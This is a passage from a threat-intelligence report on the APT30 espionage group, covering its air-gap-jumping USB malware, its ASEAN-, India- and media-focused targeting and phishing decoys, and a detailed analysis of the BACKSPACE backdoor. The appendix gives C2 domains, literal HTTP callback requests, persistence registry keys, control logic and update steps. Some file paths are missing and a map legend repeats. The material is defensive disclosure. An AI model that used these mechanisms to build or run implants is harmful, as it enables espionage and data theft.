metadata allows BACKSPACE to send less
data to the server and for the threat actor to
determine, based on results, which files to select
for uploading – both techniques result in less
data transferred over the network, which is less
likely to draw attention.
SHIPSHAPE, SPACESHIP, and FLASHFLOOD are
three separate pieces of malware with different
functions that appear to be designed to work
together to infect removable drives, spread to
additional systems (including potentially air-
gapped systems), and steal files of interest. The
tools frequently reference (in the mutexes, events,
and registry keys they use) the terms “Flash”
(perhaps for “flash drive”), “Ship”, “ShipTr”, and
“ShipUp”, as though the tools were designed to
“ship” data between computers and a removable
drive. We identified one SPACESHIP variant
that used the term “LunDu” where the term
“ShipTr” would normally appear. “LunDu” (轮渡)
means “ferry” in Chinese and the malware may
be designed to “ferry” stolen documents from
an air-gapped network, to a removable drive, to
an Internet-connected host where they can be
removed by the attacker. In addition, the malware
frequently uses the initials “LD” in several places,
including the SHIPSHAPE version file (ldupver.
txt), the folder \$LDDATA$\ used by some
versions of SPACESHIP to store stolen data, and
the .ldf file extension on the encoded files
containing stolen data.
The three tools have separate but complimentary
functions: 13
SHIPSHAPE is designed to copy files from specific
paths on a SHIPSHAPE-infected computer
to a removable drive inserted into the host.
SHIPSHAPE looks for existing files and folders on
the removable drive and marks them as hidden.
It then copies executable files to the removable
drive, using the same names as the existing
files and folders, but with an .exe extension.
SHIPSHAPE modifies the host settings to hide file
extensions, so the executables appear to be the
original documents. When viewed in Windows
Explorer, the contents of the removable drive
appear normal:
Figure 16:
Removable drive
infected
by SHIPSHAPE
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
18
However, viewing the contents of the drive from the command line will show both sets of files:
Figure 17:
Actual contents of
infected drive
A user attempting to “open” a document from
the infected drive would execute a copy of the
malware instead.
SPACESHIP is believed to be the malware that
is copied to a removable drive by SHIPSHAPE,
presumably to transfer SPACESHIP to an air-
gapped computer. SPACESHIP is designed to
search a victim computer for specific files (based
on file extension or last modified time). Files
that match the search criteria are compressed,
encoded, and copied to a specified location on the
infected host. When a removable drive is inserted
into the infected computer, the encoded files are
copied from that location to the removable drive.
FLASHFLOOD is responsible for copying files
from an inserted removable drive to the hard drive
of an infected computer, presumably to remove
files transferred from the air-gapped system to
an Internet-connected machine for removal from
the victim network. FLASHFLOOD will scan both
the infected system and any inserted removable
drive for specific files (based on file extension or
last modified time) and copy them to a specified
location, using the same compression and
encoding method as SPACESHIP. FLASHFLOOD
may also log additional information about the
victim host, including system information and data
from the user’s Windows Address Book.
APT30 identifies and steals documents,
especially documents that may be stored on
air-gapped networks.
Malicious files
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
19
APT30’S TARGETS ALIGN
with Chinese Government Interests and Focus on Southeast Asia
A
PT30 has routinely set its sights on
targets across Southeast Asia and India.
We have observed APT30 target national
governments, regionally based companies in ten
industries, and members of the media who report
on regional affairs and Chinese government
issues. Based on APT30’s confirmed targets
and their intended victims, the group’s interests
appear to concentrate on Southeast Asia regional
political, economic, and military issues, disputed
territories, and topics related to the legitimacy of
the Chinese Communist Party. This evidence leads
us to believe that APT30 serves a government’s
needs for intelligence about key government and
industry entities in Southeast Asia and India.
We used a variety of sources to understand
APT30’s intended targets. Our sources include:
APT30 malware alerts from FireEye customers,
phishing decoy document content and intended
recipients, over 200 APT30 malware samples, and
APT30’s operational timing and infrastructure.
We also noted that some 96% of the APT30
malware that we detected through our products
attempted to compromise our clients located in
East Asia.
Figure 18: APT30 malware detections by FireEye customer by country, October 2012 – October 2014
1
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
1
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
1
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
1
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
1
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
1
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
20
APT30 PURSUES MEMBERS
of the Association of Southeast Asian Nations (ASEAN)
T
he group expresses a distinct interest in
organizations and governments associated
with ASEAN, particularly so around the
time of official ASEAN meetings. ASEAN is a
major regional organization whose member
states promote cooperation and collaboration
on a range of political, economic, educational,
and social issues. ASEAN currently consists
of ten member states: Indonesia, Malaysia,
the Philippines, Singapore, Thailand, Brunei,
Vietnam, Laos, Myanmar, and Cambodia.
ASEAN-THEMED INFRASTRUCTURE
AND CUSTOMIZED TOOLS
APT30 has registered ASEAN-themed domains
for C2 and compiled data-stealing malware
that appears to be specifically designed around
ASEAN events. APT30 is most likely trying to
compromise ASEAN members or associates to
steal information that would provide insight into
the region’s politics and economics.
The domain aseanm[.]com, which appears to be
designed to mimic ASEAN’s legitimate domain
(www.asean.org), was first registered in March
2010. FireEye identified over 100 BACKSPACE
malware variants that use that domain for C2,
with compile dates that align with significant
events in the ASEAN community. The table below
shows compile times for known BACKSPACE
samples that use aseanm[.]com for C2 frequently
align with ASEAN events:
Event Date
899f512f0451a0ba4398b41ed1ae5a6d compiled 5 May 2011 6:35
e6035ec09025c1e349a7a0b3f41e90b1 compiled 5 May 2011 6:35
18th ASEAN Summit, Jakarta, Indonesia 7–8 May 2011
36a6a33cb4a13739c789778d9dd137ac compiled 9 May 2011 3:
34
Seventh ASEAN Plus Three Labour Ministers Meeting
(7th ALMM+3), Phnom Penh, Cambodia 16
11 May 2012
572c9cd4388699347c0b2edb7c6f5e25 compiled 11 May 2012 0:06
f3c29a67a7b47e644e9d1a2a0516974e compiled 11 May 2012 0:06
Senior Officials from ASEAN and China meet on implementation of
the Declaration on the Conduct of Parties on the East Sea (DOC)17
24–25 June 2012
afe8447990ecb9e1cd4086955b7db104 compiled 26 June 2012 1:
43
b5546842e08950bc17a438d785b5a019 compiled 26 June 2012 1:43
ASEAN-India Commemorative Summit, New Delhi, India18 12–20 December 2012
310a4a62ba3765cbf8e8bbb9f324c503 compiled 20 December 2012 3:53
Table 4: ASEAN events and compile times for BACKSPACE samples using aseanm.com, 2011 – 2012
21
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
A large number of recent BACKSPACE samples
helps bolster our assessment that the malware
was compiled for use in campaigns centered
on major ASEAN issues. 87 more recent
BACKSPACE samples using the C2 domain
aseanm[.]com were compiled clustered around
a handful of dates in January and April 2013. 35
samples were compiled on December 31, 2012
and January 4 and 5, 2013; on January 1, 2013, a
new Secretary-General of ASEAN, Le Luong Minh,
took office for his five-year term.19 20 Similarly, 61
samples were compiled on April 22 and 23, 2013;
the 22nd ASEAN Summit took place in Brunei on
April 24 – 25, 2013.
CUSTOMIZED MALWARE DEPLOYED
AROUND ASEAN SUMMITS IN JANUARY
AND APRIL 2013
Threat actors’ customization of malware can be a
good indication of their level of intent on gaining
access to a given target; it shows the actors
have put a concerted effort into their targeting
attempts, instead of taking a widespread “spray
and pray” approach. APT30 deployed customized
malware for use in specific campaigns targeting
ASEAN members or nations with close ties or
interests aligned with ASEAN states in January
2013 and April 2013.
APT30 created the custom BACKSPACE “ZJ
Auto” (mutex MicrosoftZjAuto), “ZJ Link”
(mutex MicrosoftZjLnk), and “ZJ Listen” (mutex
ZjListenLnk) variants. These malware samples
were customized in two ways: (1) tailored URLs
in BACKSPACE C2 communications that may
represent ASEAN country codes, and (2) custom
data theft and communication functions.
Tailored URLs
One of the customizations was in the specific
URLs used for BACKSPACE C2 communications.
BACKSPACE uses HTTP for much of its C2,
retrieving various files from the first-stage C2
server, each of which may contain additional
instructions for the malware. The C2 URL format
is typically http://
where
across samples, and
downloaded (e.g., dizhi.gif).
The
samples from January and April 2013 may
indicate the country of origin for the malware’s
intended victims (red added for emphasis) on the
table below:
Table 5: Possible targets of 2013 BACKSPACE campaigns
BACKSPACE Variant Path Possible Target
ZJ Auto (version 1.4) /autoIN/ India
ZJ Auto (version 1.4) /autoMM/ Myanmar
ZJ Auto (version 1.4) /autoSA/ unknown
ZJ Auto (version 1.4) /autoTH/ Thailand
ZJ Link (version F2.2LnkN / F2.3LnkN) /Forward-mci/ Singapore
ZJ Link (version F2.2LnkN / F2.3LnkN) /Forward-ph/ Philippines
ZJ Link (version F2.2LnkN / F2.3LnkN) /Forward-SA/ unknown
ZJ Link (version F2.2LnkN / F2.3LnkN) /Forward-th/ Thailand
ZJ Link (version F2.2LnkN / F2.3LnkN) /Forward-yw1/ unknown
ZJ Listen (versions Lan2.2LnkN, Lan2.2LnkY) /Forward-mci/ Singapore
ZJ Listen (versions Lan2.2LnkN, Lan2.2LnkY) /Forward-ph/ Philippines
ZJ Listen (version Lan2.2LnkY) /Forward-SA/ unknown
ZJ Listen (version Lan2.2LnkY) /Forward-th/ Thailand
ZJ Listen (versions Lan2.2LnkN, Lan2.2LnkY) /Forward-yw1/ unknown
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
22
Customized Malware Supporting
Data Theft
The only identified BACKSPACE “ZJ Auto”
variants were all compiled on January 4 and 5,
2013 and appear to be unique to that campaign.
This variant of BACKSPACE incorporated two
additional features of note. First, “ZJ Auto” will
search a set of specified file paths for files of
interest, and upload the list of files found to the
second-stage C2 server:
• %WINDIR%\$NtUninstallKB900727$22
• %WINDIR%\$NtUninstallKB885884$
•
•
Express\data
• custom paths specified in the file path.ini
In addition, the “ZJ Auto” variant of BACKSPACE
incorporated the custom command “{” (0x7B).
When the malware receives this command from
the controller, it will upload any files located in the
specified paths to the second-stage C2 server and
then delete them from the local drive.
Similarly, the “ZJ Link” variants were almost all
compiled in either January 2013 or April 2013,23
and also appear to be largely unique to those
campaigns. The “ZJ Link” variants added the
commands “^” (0x5E) and “(“ (0x28). “^” downloads
a file to the special directory CSIDL_TEMPLATES24
and renames the file. “(“ checks that the “ZJ
Link”-infected computer can communicate with
a specified host25 on ports 21, 80, and 443. “ZJ
Link” appears to be designed to work on concert
with another unique variant, “ZJ Listen”.26 “ZJ
Listen” variants listen for inbound connections on
those same ports (21, 80, and 443); it is the only
variant identified to date designed to receive C2
commands from an external source, as opposed
to establishing an outbound connection to a
C2 server. “ZJ Listen” could be installed on an
isolated LAN with no direct Internet connectivity,
while “ZJ Link” could be installed on a normal,
Internet-accessible computer. “ZJ Link” can accept
standard commands from the BACKSPACE
second-stage C2 server, and relay commands and
responses to the “ZJ Listen”-infected computer on
the isolated network.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
23
Figure 19:
APT30 decoy
document
on topics related
to China’s border
security
SOCIAL ENGINEERING
Consistently Includes Regional Security and Political Themes
M
any of APT30’s decoy documents use
topics related to Southeast Asia, India,
border areas, and broader security and
diplomatic issues. Decoy documents attached to
spear phishing emails are frequently indicators of
intended targeting because threat actors generally
tailor these emails to entice their intended targets
—who typically work on related issues—to click on
the attachments and infect themselves.
APT30 LEVERAGES MAJOR POLITICAL
TRANSITION AS PHISHING LURE
CONTENT IN CAMPAIGN GEARED TO KEY
POLITICAL STAKEHOLDERS
In late summer 2014, FireEye detected an APT30
spear phishing campaign at one of our regional
customers. The decoy document topic related to
a significant political transition in Southeast Asia.
The phishing email, which contained a backdoor
compiled the day prior, was likely an attempt to gain
access to targets that would give APT30 actors
insight into the level of instability and pending
changes in the country’s political leadership.
Such information is typically a high priority for a
government’s intelligence collection efforts.
According to the spear phishing emails’ recipients
list, the email was sent to over thirty recipients
in the country’s Financial Services, Government
and Defense sectors. APT30 targeted both
professional and personal (Gmail, Hotmail) email
accounts. The email was crafted entirely in the
country’s language, and the message’s subject
translated to “foreign journalists’ reactions to
the political transition.” This topic would likely
be of interest to individuals in security roles,
leadership positions, diplomatic jobs, or public or
press-facing roles. The spear phishing email was
either sent from a compromised email account
of one of the country’s governmental agencies
or was convincingly spoofed to look as though it
originated from that agency.
REPEATED DECOY SUBJECTS ON INDIA-
CHINA MILITARY RELATIONS AND
CONTESTED REGIONS
APT30 appears to use decoy documents about
China’s relationship with India, particularly
their military relations, likely in an attempt to
compromise targets with information about this
bilateral relationship. APT30 leveraged the text of
a legitimate academic journal on China’s border
security challenges in one of its decoy documents.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
24
Similarly, several of APT30’s decoy themes have
centered on Indian defense and military materiel
topics. In particular, a number of spear phishing
subjects have related to Indian aircraft carrier
and oceanographic monitoring processes, which
probably indicates a specific interest in naval and
maritime themes around Indian military activity
and disputes in the South China Sea. The decoy
document depicted in Figure 20 correlates to the
actual building and launch of India’s first Indian-
built aircraft carrier.
Decoy documents are not the only evidence
of APT30’s targeting of Indian organizations.
India-based users of VirusTotal have submitted
APT30 malware to the service, suggesting that
Indian researchers discovered APT30’s suspicious
activity at Indian organizations as well. FireEye
has also identified alerts from APT30 malware at
India-based customers including:
• An Indian aerospace and defense company
• An Indian telecommunications firm
Another recurring theme in APT30’s decoy
documents relates to regionally contested
territories, including Bhutan and Nepal. Nepal and
Bhutan are important buffer states in China-India
border conflicts and represent an opportunity to
assert regional military dominance in Asia.
Figure 20: APT30 decoy document on topics related to India’s aircraft carrier
Figure 21: APT30 decoy document on topics related to Bhutan
Several decoy themes center on
Indian defense and military materiel
topics.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
25
The decoy document depicted in Figure 21
correlates to August 2013’s 21st Round of
Boundary Talks between Bhutan and China. This
text was taken verbatim from press release put
out by Bhutan’s Ministry of Foreign Affairs.27
Nepal is also a key battleground for influence
between China and India and serves a theme in
APT30 decoy documents. Traditionally Nepal
has rested securely in India’s sphere of influence,
but more recently, China has become a more
influential player with large investments in
infrastructure projects, increased funding to the
military and police, and other traditional Chinese
influence efforts (for example, establishing
Confucius Institutes). Beyond the ongoing border
tensions, Nepal is also strategic to both India and
China for its significant water resources. The
decoy document below depicts a Nepal-related
APT30 phishing decoy document.
Figure 22: APT30 decoy document related to Nepal
Nepal is a key battleground for influence
between China and India, and serves a
theme in APT30 decoy documents.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
26
I
n addition to APT30’s Southeast Asia and
India focus, we’ve observed APT30 target
journalists reporting on issues traditionally
considered to be focal points for the Chinese
Communist Party’s sense of legitimacy, such as
corruption, the economy, and human rights. In
China, the Communist Party has the ultimate
authority over the government. China-based
threat groups have targeted journalists
before; we believe they often do so to get a
better understanding on developing stories
to anticipate unfavorable coverage and better
position themselves to shape public messaging.
A FireEye as a Service customer in the media
industry received a spear phishing message
in October 2012 with a subject line of “China
MFA Press Briefing 29 October 2012- Full
Transcript.” APT30 sent this message to over
fifty other journalists of major global news
outlets, including both official work accounts and
personal email accounts. Overall, the themes
on which the journalists reported fell into the
following categories 1 through 6, in rough order
of prevalence.
APT30’s attempts to compromise journalists and
media outlets could also be used to punish outlets
that do not provide favorable coverage – for
example, both the New York Times and Bloomberg
have had trouble securing visas for journalists in
wake of unfavorable corruption reporting. 28
Beyond targeting, we also saw summaries of
media events or reporting in decoy documents,
particularly around press releases related to
government or military updates. It appears that
APT30 could plausibly be targeting press attachés
in order to obtain access to their contacts,
which would presumably include the contact
information of other public affairs personnel or
other journalists of interest to target. Targeting
press attachés would enable APT30 to target
journalists from a trusted source, which would be
an excellent resource for spear phishing.
MARITIME
DISPUTES
2
THE STATE OF THE
CHINESE ECONOMY
1
HIGH TECH
REPORTING
CORRUPTION
ISSUES
3
DISSIDENT
COVERAGE AND
HUMAN
RIGHTS ISSUES
(for example on
Uighur issues)
4
5
DEFENSE-RELATED
TOPICS
6
27
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
COUNTRIES WHERE APT30’S CONFIRMED
AND LIKELY TARGETS OPERATE
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
28
CONCLUSION
APT30’s operations epitomize a focused, persistent, and
well-resourced threat group. They appear to consider
both the timing of their operations and prioritize their
targets. Some of the their tools’ capabilities, most
notably the ability to infect air gapped networks, suggest
both a level of planning and interest in particularly
sensitive data, such as that housed on government
networks. The group’s method for selecting and
tracking victims suggests a high level of coordination
and organization among the group’s operators. With
activity spanning more than ten years, APT30 is one
of the longest operating threat groups that we have
encountered and one of the few with a distinct regional
targeting preference.
Our research into APT30 demonstrates what many
already suspected: threat actors rely on cyber
capabilities to gather information about their immediate
neighborhood, as well as on a larger, global scale. APT30
appears to focus not on stealing businesses’ valuable
intellectual property or cutting-edge technologies,
but on acquiring sensitive data about the immediate
Southeast Asia region, where they pursue targets that
pose a potential threat to the influence and legitimacy of
the Chinese Communist Party.
In exposing APT30, we hope to increase organizations’
awareness of threats and ability to defend themselves.
APT30’s targeting interests underscore the need
for organizations across the region to defend the
information assets valuable to determined threat actors.
Full indicators associated with APT30 are available at
https://github.com/fireeye/iocs/
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
29
APPENDIX A
Detailed Malware Analysis
BACKDOORS
Despite their long history of operations, APT30 has primarily relied on a two backdoors to support
their activity: BACKSPACE29 and NETEAGLE. Both backdoors have evolved into a number of variants.
BACKSPACE has diverged into two main branches (“ZJ” and “ZR”) with numerous variations throughout
each branch. Similarly, NETEAGLE has two main versions, “Scout” and “Norton”, with Norton being the
later (more recent) version. The two backdoors differ widely in their development features, including
differing programming languages and different sets of commands supported by each. Despite this,
the two also share some high-level design similarities, including update features and the use of two-
stage command and control infrastructures. The following table highlights some of the similarities and
differences between the two families.30
Table 6: Comparison of BACKSPACE and NETEAGLE backdoors
BACKSPACE NETEAGLE
Development language C C++, MFC
Mutex Differs across variants, but uses similar naming
convention, e.g. MicrosoftZj, MicrosoftZJLnk,
MicrosoftForZR, etc.
NetEagle_Scout, Eagle-Norton360-
OfficeScan
C2 Domains Samples may use up to four C2 domains, for
configuration retrieval, downloading updates, or as a
backup domain if the primary fails.
Samples use a single C2 domain.
May Attempt to Bypass
Host-Based Firewall
Yes (observed in some versions) No (not observed)
Callback format (may
vary per sample)
GET /ForZRLnk1z/dizhi.gif HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE
6.0; Win32)HOST: www.km153.com:80
GET /update1/pic1.bmp HTTP/1.1
User-Agent: [name of malware binary]
Host: www.creammemory.com
Second stage C2 Downloads configuration file dizhi.gif from first
stage C2 URL
Downloads configuration file pic1.bmp from
first stage C2 URL
Connect to second
stage controller
Downloads connect.gif from first stage C2. If
the file contains the victim host’s hostname and ID,
connects to the controller.
Downloads pic2.bmp from first stage C2. If the
file contains the victim host’s hostname and ID,
connects to the controller.
Format of second stage
C2 configuration file
Plain text (dizhi.gif, connect.gif) RC4 encrypted (pic1.bmp, pic2.bmp)
Command format Malware commands are letters Malware commands are numbers
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
30
BACKSPACE BACKDOOR – “ZJ” VARIANT
The “ZJ” branch of the BACKSPACE backdoor appears to be the oldest or “original” branch, with versions
dating back to 2005. Variants of this branch are still being developed and compiled, adding a broad range
of supported commands while still retaining the core functionality of the original versions.
The BACKSPACE variant 8c713117af4ca6bbd69292a78069e75b was compiled on August 26, 2014. It
represents one member of the “ZJ” branch of the BACKSPACE malware family.
Initial Execution
The mutex MicrosoftZjSYNoReg is used to guarantee that only one instance of the malware is running at
any time. BACKSPACE also creates two events (MicrosoftSYNoRegExit, MicrosoftSYNoRegHaveExit)
that, when signaled, trigger all the threads and the malware itself to exit. A third event,
MicrosoftSYNoRegHaveAck, is created to be used by the malware to synchronize the processing of a task
with an acknowledgement received from the C2 server.
The malware extracts system information (OS version, build number, platform, service pack, default
language id) and proxy information (from the ProxyEnable and ProxyServer values under HKEY_CURRENT_
USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\) from the victim host.
BACKSPACE then creates the registry values lnk (type REG_SZ) and hostid (type REG_DWORD) under the
HKEY_CURRENT_USER\Software\Microsoft\CurrentHalInf registry key:
• lnk is set NTO/mol which is the encoded31 text MSN.lnk.
• hostid is set to a random value that is used to uniquely identify the victim computer.
The malware creates a copy of itself in the folder
creating the folder if necessary. For persistence, BACKSPACE creates the Windows shortcut file MSN.lnk
in
“Windows Messenger”.
C2 Domains
Like many BACKSPACE variants, this sample is configured with four different C2 domains. The C2
domains are used in HTTP requests for various files; each file requested via the URI provides additional
instructions or data to the malware. BACKSPACE C2 domains are typically used for different purposes –
that is, each domain is associated with different URIs whose associated files support different functions.
For this sample, the four C2 domains have the following roles:
Table 7: BACKSPACE C2 domains and registration dates
Alias C2 Domain Description Zone Registration Date
D1 www.iapfreecenter[.]com Primary C2 domain 5/23/2014
D2 www.appsecnic[.]com Backup C2 domain; run/hide configuration 3/15/2010
D3 www.newpresses[.]com Run/hide configuration 3/17/2010
D4 www.km153[.]com Run/hide configuration 8/30/2007
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
31
“Run” vs “Hide” Mode
BACKSPACE reads the registry value hFlag under HKEY_CURRENT_USER\Software\Microsoft\
CurrentHalInf. If it exists and is set to 1 the malware switches to “Run Mode”; otherwise the malware
operates in “Hidden Mode”.
To switch to “Run mode”, BACKSPACE attempts to contact its C2 servers for validation and to obtain
configuration data (stored in a file named nur.txt). It parses the configuration data and performs a series
of increasingly generic checks to see whether (by inclusion or exclusion) it should remain in “Run mode”:
1. Make an HTTP request to www.iapfreecenter[.]com/Lnk1z/hostlist.txt and validate that the
last byte of the response is 0xFE.
2. Make an HTTP request to the legitimate URL automation.whatismyip.com/n09230945.asp to
obtain the external IP of the victim computer.
3. Make an HTTP request to either www.newpresses[.]com/http/nur.txt, www.km153[.]com/
http/nur.txt or www.appsecnic[.]com/http/nur.txt and validate that the response starts with
“abcd1234”; if none of the servers respond accordingly, setting “Run Mode” fails.
4. If the response from the server contains the “runhost=” option, search for the victim computer’s
hostname in the option data. If found, setting “Run Mode” succeeds; else go to step 5.
5. If the response from the server contains the “runhostexcept=” option, search for the victim
computer’s hostname in the option data. If found, setting “Run Mode” fails; else go to step 6.
6. If the response from the server contains the “runip=” option, search for the victim computer’s
external IP (obtained in step 2) in the option data. If found, setting “Run Mode” succeeds; else go to
step 7.
7. If the response from the server contains the “runipexcept=” option, search for the victim computer’s
external IP (obtained in step 2) in the option data. If found, setting “Run Mode” fails; else go to step 8.
8. If the response from the server contains the “rundir=” option, search for the current C2 URL (e.g.,
www.iapfreecenter[.]com/Lnk1z) in the option data. If found, setting “Run Mode” succeeds; else
go to step 9.
9. If the response from the server contains the “rundirexcept=” option, search for the current C2 URL
(e.g., www.iapfreecenter[.]com/Lnk1z) in the option data. If found, setting “Run Mode” fails; else go
to step 10.
10. If the response from the server contains the “runweb=” option, search for the current C2 domain
(e.g., www.iapfreecenter[.]com) in the option data. If found, setting “Run Mode” succeeds; else go
to step 11.
11. If the response from the server contains the “runwebexcept=” option, search for the current C2
domain (e.g., www.iapfreecenter[.]com) in the option data. If found, setting “Run Mode” fails; else
go to step 12.
12. If the response from the server contains the “runall=1” option, setting “Run Mode” succeeds.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
32
If switching to “Run Mode” fails, BACKSPACE reads the registry value PassPath under HKEY_CURRENT_
USER\Software\Microsoft\CurrentHalInf, attempts to terminate the process identified by the registry
data, and then exits.
If BACKSPACE successfully switches to “Run Mode”, the hFlag registry value under HKEY_CURRENT_USER\
Software\Microsoft\CurrentHalInf is deleted. The victim computer’s hostname and IP are saved.
A thread to switch the malware back to “Hidden Mode” is started. The thread runs indefinitely
until the MicrosoftSYNoRegExit event gets signaled; once signaled, the thread signals the
MicrosoftSYNoRegHaveExit event. In this thread, the malware reads the registry value PassPath under
HKEY_CURRENT_USER\Software\Microsoft\CurrentHalInf, attempts to terminate the process identified
by the registry data, and then exits.
Similar to switching to “Run mode” BACKSPACE conducts a series of checks to attempt to switch to
“Hidden Mode”:
1. Make an HTTP request to www.iapfreecenter[.]com/Lnk1z/hostlist.txt and validate that the
last byte of the response is 0xFF.
2. Make an HTTP request to the legitimate URL automation.whatismyip[.]com/n09230945.asp to
obtain the external IP of the victim computer.
3. Make an HTTP request to either www.newpresses[.]com/some/edih.txt, www.km153[.]com/
some/edih.txt or www.appsecnic[.]com/some/edih.txt and validate that the response starts with
“abcd1234”; if none of the servers respond accordingly, setting “Hidden Mode” fails.
4. If the response from the server contains the “killpath=” option, write the option data to the
registry value PassPath under HKEY_CURRENT_USER\Software\Microsoft\CurrentHalInf; this data
represents the path of a process to be terminated.
5. If the response from the server contains the “hidehost=” option, search for the victim computer’s
hostname in the option data. If found, setting “Hidden Mode” succeeds; else go to step 5.
6. If the response from the server contains the “hidehostexcept=” option, search for the victim
computer’s hostname in the option data. If found, setting “Hidden Mode” fails; else go to step 6.
7. If the response from the server contains the “hideip=” option, search for the victim computer’s
external IP (obtained in step 2) in the option data. If found, setting “Hidden Mode” succeeds; else go
to step 7.
8. If the response from the server contains the “hideipexcept=” option, search for the victim
computer’s external IP (obtained in step 2) in the option data. If found, setting “Hidden Mode” fails;
else go to step 8.
9. If the response from the server contains the “hidedir=” option, search for the current C2 URL (e.g.,
www.iapfreecenter[.]com/Lnk1z or www.appsecnic[.]com/Lnk1z) in the option data. If found,
setting “Hidden Mode” succeeds; else go to step 9.
10. If the response from the server contains the “hidedirexcept=” option, search for the current C2
URL in the option data. If found, setting “Hidden Mode” fails; else go to step 10.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
33
11. If the response from the server contains the “hideweb=” option, search for the current C2 domain
(e.g., www.iapfreecenter[.]com or www.appsecnic[.]com) in the option data. If found, setting
“Hidden Mode” succeeds; else go to step 11.
12. If the response from the server contains the “hidewebexcept=” option, search for the current C2
domain in the option data. If found, setting “Hidden Mode” fails; else go to step 12.
13. If the response from the server contains the “hideall=1” option, setting “Hidden Mode” succeeds.
If BACKSPACE successfully switches to “Hidden Mode” succeeds, the hFlag registry value under HKEY_
CURRENT_USER\Software\Microsoft\CurrentHalInf is created and set to 1.
The malware stores the hostname of the victim computer’s primary Domain Controller to be sent to the
second stage C2 server as part of the host details data.
Primary vs Backup C2 Domains
BACKSPACE sends an HTTP request to www.appsecnic[.]com/Lnk1z/bak.txt. If the response starts with
“qazWSX123$%^”, it sets the primary C2 URL domain to www.appsecnic[.]com.
Download Additional Files
BACKSPACE sends an HTTP request to the primary C2 URL domain and URL path /Lnk1z/app.txt and
saves the file to
started.
In addition, BACKSPACE sends an HTTP request to the primary C2 URL domain and URL path /
Lnk1z/hostlist.txt. If the victim computer’s hostname is found in the response, BACKSPACE makes
a new HTTP request to the primary C2 URL domain and URL path /Lnk1z/myapp.txt and saves the
file to
started.
BACKSPACE will then delete the following files:
•
•
•
•
Self-Update Mechanism
BACKSPACE performs the following update tasks:
1. Obtain the latest available version number by making an HTTP to request to the primary C2 URL
domain and URL path /Lnk1z/ver.txt; if the version returned does not match the version of the
current binary (“2.00MSNN” for this sample), go to step 2.
2. Download a new binary by making an HTTP request to the primary C2 URL domain and URL path /
Lnk1z/exe.txt and saving the file to
3. Copy
UpdateMessenger.exe.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
34
4. If
If the previous update task fails, BACKSPACE performs a new update task:
1. Obtain the latest available version number by making an HTTP to request to the primary C2 URL
domain and URL path /Lnk1z/SomeUpVer.txt; if the version returned does not match the version of
the current binary, go to step 2.
2. Make an HTTP request to the primary C2 URL domain and URL path /Lnk1z/SomeUpList.txt and
validate that the victim computer’s host name is in the response; if true, go to step 3.
3. Download a new binary by making an HTTP request to the primary C2 URL domain and URL path /
Lnk1z/SomeUpExe.txt and saving the file to
4. Copy
UpdateMessenger.exe.
5. If
Second Stage C2 Server
Next, BACKSPACE makes an HTTP request to the primary C2 URL domain and URL path /Lnk1z/
dizhi.gif. Dizhi.gif is a 10-byte configuration file that specifies an IP address and three port numbers.
Figure 23: Second stage C2 server information in dizhi.gif
BACKSPACE starts a new thread to send details about the victim computer (ComputerName, IP,
SystemDetails, DefaultLangID, HostID, Proxy info, malware current version, malware current domain,
and information about the logical drives) to Port1 on the new C2 server. The malware will use the victim
